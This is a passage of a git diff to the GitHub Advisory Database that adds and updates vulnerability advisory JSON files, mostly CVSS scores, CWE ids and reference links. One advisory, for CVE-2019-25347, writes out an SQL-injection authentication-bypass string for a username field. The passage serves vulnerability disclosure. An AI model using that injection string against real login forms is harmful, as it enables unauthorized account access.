advisories/unreviewed/2026/02/GHSA-qq4x-5chw-w95x/GHSA-qq4x-5chw-w95x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qrx6-r62c-hcv3/GHSA-qrx6-r62c-hcv3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r8m3-w58q-qp9h/GHSA-r8m3-w58q-qp9h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgrq-m353-3wqj/GHSA-rgrq-m353-3wqj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rh68-c6m2-cjhj/GHSA-rh68-c6m2-cjhj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w2vm-pjj6-6q8j/GHSA-w2vm-pjj6-6q8j.json diff --git a/advisories/unreviewed/2024/10/GHSA-m786-h9gp-8q53/GHSA-m786-h9gp-8q53.json b/advisories/unreviewed/2024/10/GHSA-m786-h9gp-8q53/GHSA-m786-h9gp-8q53.json index cc6fbdf697092..21d6fbc4baffb 100644 --- a/advisories/unreviewed/2024/10/GHSA-m786-h9gp-8q53/GHSA-m786-h9gp-8q53.json +++ b/advisories/unreviewed/2024/10/GHSA-m786-h9gp-8q53/GHSA-m786-h9gp-8q53.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m786-h9gp-8q53", - "modified": "2024-10-08T18:33:14Z", + "modified": "2026-02-12T21:31:24Z", "published": "2024-10-08T18:33:14Z", "aliases": [ "CVE-2024-43468" @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-43468" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-h3c8-rqv3-223w/GHSA-h3c8-rqv3-223w.json b/advisories/unreviewed/2026/01/GHSA-h3c8-rqv3-223w/GHSA-h3c8-rqv3-223w.json index 4e192894bef48..0088c196cc8a2 100644 --- a/advisories/unreviewed/2026/01/GHSA-h3c8-rqv3-223w/GHSA-h3c8-rqv3-223w.json +++ b/advisories/unreviewed/2026/01/GHSA-h3c8-rqv3-223w/GHSA-h3c8-rqv3-223w.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-285" + "CWE-285", + "CWE-863" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-m83h-48rr-jcrh/GHSA-m83h-48rr-jcrh.json b/advisories/unreviewed/2026/01/GHSA-m83h-48rr-jcrh/GHSA-m83h-48rr-jcrh.json index 339c06855845f..1817525dc462b 100644 --- a/advisories/unreviewed/2026/01/GHSA-m83h-48rr-jcrh/GHSA-m83h-48rr-jcrh.json +++ b/advisories/unreviewed/2026/01/GHSA-m83h-48rr-jcrh/GHSA-m83h-48rr-jcrh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m83h-48rr-jcrh", - "modified": "2026-01-28T09:30:30Z", + "modified": "2026-02-12T21:31:24Z", "published": "2026-01-28T09:30:30Z", "aliases": [ "CVE-2025-40536" @@ -23,6 +23,14 @@ "type": "WEB", "url": "https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm" }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-40536" + }, + { + "type": "WEB", + "url": "https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399" + }, { "type": "WEB", "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40536" diff --git a/advisories/unreviewed/2026/01/GHSA-mwgm-j9q4-3cm5/GHSA-mwgm-j9q4-3cm5.json b/advisories/unreviewed/2026/01/GHSA-mwgm-j9q4-3cm5/GHSA-mwgm-j9q4-3cm5.json index cf9f481e7b0fd..565c667969980 100644 --- a/advisories/unreviewed/2026/01/GHSA-mwgm-j9q4-3cm5/GHSA-mwgm-j9q4-3cm5.json +++ b/advisories/unreviewed/2026/01/GHSA-mwgm-j9q4-3cm5/GHSA-mwgm-j9q4-3cm5.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-267" + "CWE-267", + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json b/advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json index b926ffbf0a52b..af117de673289 100644 --- a/advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json +++ b/advisories/unreviewed/2026/02/GHSA-25q2-mm9v-fcj8/GHSA-25q2-mm9v-fcj8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-25q2-mm9v-fcj8", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20612" ], "details": "A privacy issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json index 902a65d38cb88..26994f0e7141f 100644 --- a/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json +++ b/advisories/unreviewed/2026/02/GHSA-26vr-h5vf-58cq/GHSA-26vr-h5vf-58cq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-26vr-h5vf-58cq", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20674" ], "details": "A privacy issue was addressed by removing sensitive data. This issue is fixed in iOS 26.3 and iPadOS 26.3. An attacker with physical access to a locked device may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json b/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json index 03e6600219958..ca8b2e86d2f54 100644 --- a/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json +++ b/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-22" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json b/advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json index 76e497aa6e23a..0f6a37e0ea319 100644 --- a/advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json +++ b/advisories/unreviewed/2026/02/GHSA-3993-26cm-wfhm/GHSA-3993-26cm-wfhm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3993-26cm-wfhm", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20645" ], "details": "An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-1021" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json b/advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json index 6840bc4a034b2..55b7236d9be02 100644 --- a/advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json +++ b/advisories/unreviewed/2026/02/GHSA-3p5c-6wpr-gh3w/GHSA-3p5c-6wpr-gh3w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3p5c-6wpr-gh3w", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20682" ], "details": "A logic issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker may be able to discover a user’s deleted notes.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3qgp-4ccx-9wvf/GHSA-3qgp-4ccx-9wvf.json b/advisories/unreviewed/2026/02/GHSA-3qgp-4ccx-9wvf/GHSA-3qgp-4ccx-9wvf.json new file mode 100644 index 0000000000000..3ec7a54459905 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3qgp-4ccx-9wvf/GHSA-3qgp-4ccx-9wvf.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qgp-4ccx-9wvf", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2026-26218" + ], + "details": "newbee-mall includes pre-seeded administrator accounts in its database initialization script. These accounts are provisioned with a predictable default password. Deployments that initialize or reset the database using the provided schema and fail to change the default administrative credentials may allow unauthenticated attackers to log in as an administrator and gain full administrative control of the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26218" + }, + { + "type": "WEB", + "url": "https://github.com/newbee-ltd/newbee-mall/issues/119" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/newbee-mall-default-seeded-administrator-credentials-allow-account-takeover" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json b/advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json index 3d44f0bb9a32e..2b5315fc8a51c 100644 --- a/advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json +++ b/advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3v9p-vgm5-cgm3", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-57707" ], "details": "An improper neutralization of directives in statically saved code ('Static Code Injection') vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to access restricted data / files.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json b/advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json index 81ec8a5a69a0b..f3b3ce97000b8 100644 --- a/advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json +++ b/advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-59g4-3crj-9w92", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-62856" ], "details": "A path traversal vulnerability has been reported to affect File Station 5. If a local attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json b/advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json index 5a595f7141ca4..354b3b522dde7 100644 --- a/advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json +++ b/advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-682g-84mv-mcxh", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54162" ], "details": "A path traversal vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json b/advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json index cd44cb75c296a..edd64809ccc9b 100644 --- a/advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json +++ b/advisories/unreviewed/2026/02/GHSA-74vw-h65p-vr44/GHSA-74vw-h65p-vr44.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-74vw-h65p-vr44", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20673" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Tahoe 26.3, macOS Sonoma 14.8.4. Turning off \"Load remote content in messages” may not apply to all mail previews.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -33,7 +38,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json b/advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json index 20497e0975bc0..0124d56aa7e26 100644 --- a/advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json +++ b/advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-76mg-x9r8-w496", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54163" ], "details": "A NULL pointer dereference vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json b/advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json index 1c3f01867d478..2f06c34301b71 100644 --- a/advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json +++ b/advisories/unreviewed/2026/02/GHSA-77vc-xm5w-w2vq/GHSA-77vc-xm5w-w2vq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-77vc-xm5w-w2vq", - "modified": "2026-02-12T18:30:24Z", + "modified": "2026-02-12T21:31:27Z", "published": "2026-02-12T18:30:24Z", "aliases": [ "CVE-2025-69807" ], "details": "p2r3 Bareiron commit: 8e4d4020d is vulnerable to Buffer Overflow, which allows unauthenticated remote attackers to cause a denial of service via a packet sent to the server.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-120" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T18:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-79w3-8jvg-fr55/GHSA-79w3-8jvg-fr55.json b/advisories/unreviewed/2026/02/GHSA-79w3-8jvg-fr55/GHSA-79w3-8jvg-fr55.json new file mode 100644 index 0000000000000..58b0c0deb4503 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-79w3-8jvg-fr55/GHSA-79w3-8jvg-fr55.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-79w3-8jvg-fr55", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25347" + ], + "details": "thesystem App 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating the username parameter. Attackers can inject malicious SQL code like ' or '1=1 to the username field to gain unauthorized access to user accounts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25347" + }, + { + "type": "WEB", + "url": "https://github.com/kostasmitroglou/thesystem" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47432" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/thesystem-app-username-sql-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json b/advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json index 5a2ea86496aaa..0c668011a5851 100644 --- a/advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json +++ b/advisories/unreviewed/2026/02/GHSA-8258-fr2h-jgx8/GHSA-8258-fr2h-jgx8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8258-fr2h-jgx8", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-61879" ], "details": "In Infoblox NIOS through 9.0.7, a High-Privileged User Can Trigger an Arbitrary File Write via the Account Creation Mechanism.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T17:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json b/advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json index 008467574dd35..ca1f157294c02 100644 --- a/advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json +++ b/advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8863-jvcv-whf3", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-66278" ], "details": "A path traversal vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json b/advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json index b96bfe924a4f7..b2e60d417431c 100644 --- a/advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json +++ b/advisories/unreviewed/2026/02/GHSA-934f-cmh4-43m7/GHSA-934f-cmh4-43m7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-934f-cmh4-43m7", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20628" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to break out of its sandbox.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json b/advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json index 043ab44074113..f4ca2e4604670 100644 --- a/advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json +++ b/advisories/unreviewed/2026/02/GHSA-946c-234f-fccx/GHSA-946c-234f-fccx.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-946c-234f-fccx", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20653" ], "details": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json b/advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json index 108707de3591c..530193b8b1754 100644 --- a/advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json +++ b/advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-96g7-r737-95hv", - "modified": "2026-02-11T21:30:39Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-70297" ], "details": "A stored cross-site scripting (XSS) vulnerability in the recipe asset upload and media serving component in Mealie 3.3.1 allows remote authenticated users to inject arbitrary web script or HTML via an uploaded SVG file that is served as image/svg+xml and rendered by a victim s browser.", - 